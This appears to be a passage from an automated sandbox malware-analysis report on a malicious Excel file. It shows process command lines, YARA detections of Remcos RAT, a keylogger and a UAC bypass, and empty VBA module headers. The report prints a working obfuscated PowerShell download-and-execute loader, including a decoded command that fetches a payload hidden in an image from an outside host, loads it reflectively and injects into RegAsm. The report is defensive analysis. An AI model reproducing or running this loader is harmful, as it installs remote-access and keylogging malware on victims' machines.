                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? 
?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? 
?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? 
? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? 
?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?Ec? ? ? ? ?RwBS? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?w? ? ? ? ?DY? ? ? ? ?Lw? ? ? ? ?4? ? ? ? ?DI? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DE? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dg? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                              Imagebase:0x2f0000
                                                                              File size:427'008 bytes
                                                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:16:29:34
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                                              Imagebase:0x2f0000
                                                                              File size:427'008 bytes
                                                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:16:29:39
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:16:29:39
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:15
                                                                              Start time:16:29:42
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:16:29:42
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:16:29:42
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco"
                                                                              Imagebase:0x12c0000
                                                                              File size:64'704 bytes
                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Call Graph


                                                                              Module: Sheet1

                                                                              Declaration
                                                                              Line  Content
                                                                              1     Attribute VB_Name = "Sheet1"
                                                                              2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                              3     Attribute VB_GlobalNameSpace = False
                                                                              4     Attribute VB_Creatable = False
                                                                              5     Attribute VB_PredeclaredId = True
                                                                              6     Attribute VB_Exposed = True
                                                                              7     Attribute VB_TemplateDerived = False
                                                                              8     Attribute VB_Customizable = True

                                                                              Module: Sheet2

                                                                              Declaration
                                                                              Line  Content
                                                                              1     Attribute VB_Name = "Sheet2"
                                                                              2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                              3     Attribute VB_GlobalNameSpace = False
                                                                              4     Attribute VB_Creatable = False
                                                                              5     Attribute VB_PredeclaredId = True
                                                                              6     Attribute VB_Exposed = True
                                                                              7     Attribute VB_TemplateDerived = False
                                                                              8     Attribute VB_Customizable = True

                                                                              Module: Sheet3

                                                                              Declaration
                                                                              Line  Content
                                                                              1     Attribute VB_Name = "Sheet3"
                                                                              2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                              3     Attribute VB_GlobalNameSpace = False
                                                                              4     Attribute VB_Creatable = False
                                                                              5     Attribute VB_PredeclaredId = True
                                                                              6     Attribute VB_Exposed = True
                                                                              7     Attribute VB_TemplateDerived = False
                                                                              8     Attribute VB_Customizable = True

                                                                              Module: ThisWorkbook

                                                                              Declaration
                                                                              Line  Content
                                                                              1     Attribute VB_Name = "ThisWorkbook"
                                                                              2     Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                              3     Attribute VB_GlobalNameSpace = False
                                                                              4     Attribute VB_Creatable = False
                                                                              5     Attribute VB_PredeclaredId = True
                                                                              6     Attribute VB_Exposed = True
                                                                              7     Attribute VB_TemplateDerived = False
                                                                              8     Attribute VB_Customizable = True

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.442663380.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 352d89f8800b5698093fc7c3db3946e404a78d540618a938f2136e0bf72d0af3
                                                                                • Instruction ID: 2065e26e4b682aa357ab7d29ad4b05027fdf65d098adc12d8fda7da5a39c43b7
                                                                                • Opcode Fuzzy Hash: 352d89f8800b5698093fc7c3db3946e404a78d540618a938f2136e0bf72d0af3
                                                                                • Instruction Fuzzy Hash: 5A01A771508340AEEB148A15DC84767BB98EF81764F1CC555FC490B192C3799945CAB1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.442663380.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 13bc403d4af0bcb4328e59a91e24f0db057d9fa851cc6b89cd9cd2743ce10c3d
                                                                                • Instruction ID: 770ab500e1c2a6bca71f580bcdfd193d34b6b926d71ff6f889bbbfe9774f6561
